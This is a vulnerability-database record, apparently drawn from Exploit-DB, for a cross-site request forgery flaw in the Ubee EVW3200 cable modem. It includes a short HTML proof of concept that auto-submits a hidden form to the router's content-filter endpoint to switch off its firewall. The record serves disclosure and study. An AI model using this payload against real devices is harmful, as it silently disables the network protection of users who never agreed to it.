ID
VAR-E-201403-0403
EDB ID
32238
TITLE
Ubee EVW3200 - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Ubee EVW3200 - Cross-Site Request Forgery. CVE-104456 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | ubee | model: | evw3200 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
# Exploit Title: Ubee EVW3200 - Multiple Cross Site Request Forgery
# Google Dork: N/A
# Date: 02-03-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.ubeeinteractive.com/
# Software Link:
http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20
# Version: All
# Tested on: N/A
# CVE : N/A
#
## Description:
#
# The Ubee ECV3200 does not use Anti CSRF tokens in any of its forms.
#
## PoC:
#
# <form name="reseller" method="POST"
action="http://192.168.178.1/goform/RgContentFilter" id="csrf_attack"
target="csrf_iframe">
# <input type="hidden" name="cbFirewall" value="0">
# </form>
#
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
#
# <script>
# document.getElementById('csrf_attack').submit();
# </script>
# <center>The payload has been executed....</center>
#</html>
#
#
# More information can be found at:
http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.6
CREDITS
Jeroen - IT Nerdbox
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 32238 | Trust: 1.6 |
| db: | EDBNET | id: | 53784 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/32238/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 32238 |
| db: | EDBNET | id: | 53784 |
LAST UPDATE DATE
2022-07-27T09:35:26.201000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 32238 | date: | 2014-03-13T00:00:00 |
| db: | EDBNET | id: | 53784 | date: | 2014-03-13T00:00:00 |